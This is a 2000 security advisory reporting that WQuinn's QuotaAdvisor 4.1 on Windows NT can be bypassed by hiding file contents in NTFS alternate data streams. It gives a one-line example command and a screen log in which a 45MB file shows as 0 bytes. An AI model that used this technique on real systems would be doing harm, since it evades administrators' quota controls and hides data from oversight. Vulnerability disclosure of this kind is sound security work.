============================================================================ Delphis Consulting Plc ============================================================================ Security Team Advisories [25/09/2000] securityteam@delphisplc.com [http://www.delphisplc.com/thinking/whitepapers/] ============================================================================ Adv : DST2K0037 Title : QuotaAdvisor 4.1 by WQuinn is susceptible to alternative data streams to bypass quotas. Author : DCIST (securityteam@delphisplc.com) O/S : Microsoft Windows NT 4 Server (SP5) Product : QuotaAdvisor 4.1 (Build 450) Date : 25/09/2000 I. Description II. Solution III. Disclaimer ============================================================================ I. Description ============================================================================ Vendor URL: http://www.wquinn.com/ Delphis Consulting Internet Security Team (DCIST) discovered the following vulnerability in QuotaAdvisor under Windows NT. Severity: medium - Bypassing quotas It is possible to bypass the quotas imposed by QuotaAdvisor by utilising data streams alternative to the default. example: cat e:\45mbfile.doc > 0mbfile.doc:hidden This would enable a 45mb file to appear as if the user is not utilising their quota. CAT was taken from the NT Resource KIT. Explorer & WQuinns space monitor shows the file as 0bytes although the total amount of free disk space availible does decrease. example screen log: I:\quota>copy C:\45mbfile.doc .\ There is not enough space on the disk. 0 file(s) copied. I:\quota>cat C:\45mbfile.doc > .\0mbfile.doc:hidden I:\quota>.\streams .\ .\0mbfile.doc 45698829 :hidden:$DATA I:\quota>dir hello.exe Volume in drive I has no label. Volume Serial Number is C0FA-B4DF Directory of I:\quota 09/25/2000 05:49p 0 0mbfile.doc 1 File(s) 0 bytes 0 Dir(s) 1,841,468,928 bytes free II. Solution ============================================================================ Vendor Status: Informed Currently there us no known solution to this problem. The following are the vendors comments in response to our advisory: "This is a known issue based on a design choice to ignore streams. We plan in the future to support them." III. Disclaimer ============================================================================ THE INFORMATION CONTAINED IN THIS ADVISORY IS BELIEVED TO BE ACCURATE AT THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS GIVEN, EXPRESS OR IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS. NEITHER THE AUTHOR NOR THE PUBLISHER ACCEPTS ANY LIABILITY WHATSOEVER FOR ANY DIRECT, INDIRECT OR CONSEQUENTIAL LOSS OR DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE PLACED ON, THIS INFORMATION FOR ANY PURPOSE. ============================================================================ This e-mail and any files transmitted with it are intended solely for the addressee and are confidential. They may also be legally privileged.Copyright in them is reserved by Delphis Consulting PLC ["Delphis"] and they must not be disclosed to, or used by, anyone other than the addressee.If you have received this e-mail and any accompanying files in error, you may not copy, publish or use them in any way and you should delete them from your system and notify us immediately.E-mails are not secure. Delphis does not accept responsibility for changes to e-mails that occur after they have been sent. Any opinions expressed in this e-mail may be personal to the author and may not necessarily reflect the opinions of Delphis